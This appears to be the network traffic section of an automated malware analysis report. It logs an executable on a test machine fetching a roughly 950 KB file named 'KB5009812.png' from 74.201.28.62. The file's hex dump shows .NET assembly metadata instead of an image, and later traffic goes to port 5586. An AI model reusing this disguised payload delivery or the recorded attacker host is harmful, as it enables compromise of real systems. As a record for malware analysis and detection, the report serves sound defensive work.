                Jan 15, 2022 01:14:07.288635015 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288682938 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288706064 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288737059 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288742065 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288789034 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288794041 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288841963 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288846016 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288896084 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288898945 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288945913 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.288950920 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.288997889 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289000034 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289050102 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289057970 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289103031 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289112091 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289155960 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289170980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289207935 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289223909 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289261103 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289266109 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289314032 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289320946 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289365053 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289378881 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289416075 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289433956 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289473057 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289482117 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289530039 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289535046 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289583921 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289638042 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289671898 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289680004 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289690018 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289714098 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289742947 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289747953 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289798021 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289808035 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289866924 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289870977 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289926052 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289968014 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.289977074 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.289979935 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290029049 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290036917 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290081024 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290096045 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290134907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290152073 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290186882 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290205002 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290242910 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290262938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290293932 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290337086 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290347099 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290349007 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290400982 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290416956 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290457964 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290473938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290510893 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290529966 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290565014 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290575981 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290618896 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290640116 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290673971 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290678978 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290734053 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290747881 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290786982 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290827990 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290838003 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290852070 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290890932 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290899992 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290942907 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.290950060 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.290992975 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291002989 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291048050 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291059017 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291104078 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291109085 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291155100 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291199923 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291205883 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291213989 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291260004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291269064 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291313887 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291337013 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291366100 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291413069 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291415930 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291425943 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291467905 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291482925 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291520119 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291528940 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291572094 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291582108 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291627884 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291632891 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291680098 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291702032 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291733980 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291739941 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291786909 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291791916 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291836977 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291842937 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291888952 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.291894913 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291939020 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.291944981 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292000055 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292005062 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292057037 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292058945 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292112112 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292115927 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292162895 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292166948 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292215109 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292220116 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292264938 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292272091 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292316914 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292321920 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292367935 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292372942 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292418957 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292426109 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292470932 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292474985 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292521954 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292531013 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292574883 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292578936 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292629004 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292633057 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292679071 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292685032 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292732000 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292738914 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292783022 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.292788982 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.292841911 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383249998 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383304119 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383342981 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383357048 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383372068 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383409023 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383423090 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383475065 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383503914 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383517027 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383526087 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383575916 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383583069 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383627892 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383630991 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383688927 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383696079 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383742094 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383744955 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383795023 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383837938 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383843899 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383850098 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383894920 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383903980 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.383950949 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.383955002 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384001017 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384006977 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384052038 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384057045 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384102106 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384108067 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384152889 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384170055 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384207010 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384219885 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384257078 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384274960 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384311914 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384327888 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384355068 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.384367943 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.384668112 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.784471035 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.830234051 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:07.928632021 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.928698063 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:07.928894997 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:14:08.027017117 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:08.027077913 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:08.027106047 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:14:08.027208090 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.019145012 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.118525982 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.118686914 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.279473066 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.425277948 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.426322937 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.536911964 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.537805080 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.537919998 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.537956953 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.537972927 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538027048 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538067102 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538091898 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.538108110 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538151026 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.538165092 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538207054 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538238049 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.538247108 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.538292885 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637068033 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637115955 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637155056 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637193918 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637193918 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637237072 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637237072 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637278080 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637316942 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637325048 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637356997 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637394905 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637434006 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637439966 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637475014 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637516022 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637521982 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637557030 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637563944 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637594938 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637634993 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637643099 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.637676001 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637703896 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.637723923 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.658109903 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.800189972 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:11.801328897 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:11.956450939 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:19.441833973 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:19.492527008 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:19.591075897 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:19.633193970 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:41.293586016 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:41.440407991 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:41.440500021 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:15:41.581079006 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:48.045872927 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:15:48.145240068 CET804976074.201.28.62192.168.2.4
                Jan 15, 2022 01:15:48.145315886 CET4976080192.168.2.474.201.28.62
                Jan 15, 2022 01:16:04.098561049 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:16:04.152520895 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:16:04.250919104 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:16:04.308728933 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:16:11.097126961 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:16:11.240657091 CET55864980074.201.28.62192.168.2.4
                Jan 15, 2022 01:16:11.240817070 CET498005586192.168.2.474.201.28.62
                Jan 15, 2022 01:16:11.393943071 CET55864980074.201.28.62192.168.2.4

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Jan 15, 2022 01:14:23.194775105 CET8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)

                HTTP Request Dependency Graph

                • 74.201.28.62

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.44976074.201.28.6280C:\Users\user\Desktop\45I8GbQlUj.exe
                TimestampkBytes transferredDirectionData
                Jan 15, 2022 01:14:06.276602983 CET875OUTGET /book/KB5009812.png HTTP/1.1
                Host: 74.201.28.62
                Connection: Keep-Alive
                Jan 15, 2022 01:14:06.379652977 CET1011INHTTP/1.1 200 OK
                Content-Type: image/png
                Last-Modified: Fri, 14 Jan 2022 18:56:38 GMT
                Accept-Ranges: bytes
                ETag: "951ab975789d81:0"
                Server: Microsoft-IIS/10.0
                X-Powered-By: ASP.NET
                Date: Sat, 15 Jan 2022 00:14:06 GMT
                Content-Length: 949760
                Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 10 00 00 00 0c 00 0e 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 71 00 6a 00 6c 00 76 00 62 00 67 00 79 00 72 00 71 00 66 00 68 00 69 00 6a 00 51 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 14 00 50 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 32 00 32 00 30 00 32 00 20 00 a9 00 20 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 11 00 46 00 00 00 6c 00 6c 00 64 00 2e 00 6b 00 71 00 6a 00 6c 00 76 00 62 00 67 00 79 00 72 00 71 00 66 00 68 00 69 00 6a 00 51 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 14 00 48 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31
                Data Ascii: 50.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.kqjlvbgyrqfhijQemaneliFlanigirOPskramedarTlageL*2202 thgirypoCthgirypoClageLFlld.kqjlvbgyrqfhijQemaNlanretnIH0.0.0.1
                Jan 15, 2022 01:14:06.379785061 CET1013INData Raw: 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00 6c 00 69 00 46 00 01 00 08 00 30 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00 74 00 70 00 69 00 72 00 63 00 73 00 65 00 44 00 65 00 6c 00 69 00 46 00 01 00 01 00 2a 00 00 00 00 00 00
                Data Ascii: noisreVeliF0noitpircseDeliF*emaNynapmoC"stnemmoC0b400000PofnIeliFgnirtStnoitalsnarT$o
                Jan 15, 2022 01:14:06.379858017 CET1014INData Raw: 00 28 00 22 00 24 00 40 00 6b 00 36 00 23 15 01 00 52 00 4e 00 61 00 22 00 22 00 27 00 40 00 6b 00 36 00 23 15 00 00 33 00 3f 00 4d 00 28 00 22 00 3e 00 3f 00 6b 00 36 00 23 15 00 00 38 00 5c 00 74 00 74 00 21 00 3e 00 3e 00 6b 00 36 00 23 15 00
                Data Ascii: ("$@k6#RNa""'@k6#3?M(">?k6#8\tt!>>k6#ekc$"i>k6#c_Q$"M@k6#`M6$"-Ak6#Z)U#"h>k6#Vf0#""@k6#PBO""8?k6#A=qu!j@k6#CI.
                Jan 15, 2022 01:14:06.379923105 CET1016INData Raw: 50 83 12 1d 08 08 08 50 83 12 50 83 12 08 0a 07 15 19 83 12 1c 1c 02 00 07 1c 19 83 12 1c 02 00 07 c9 80 12 08 94 82 12 03 07 09 c0 81 12 c0 81 12 02 07 08 02 18 1c 01 03 00 06 19 83 12 18 01 02 00 07 08 08 05 1d 18 01 04 00 08 08 18 01 00 04 18
                Data Ascii: PPP0|! ! !Q
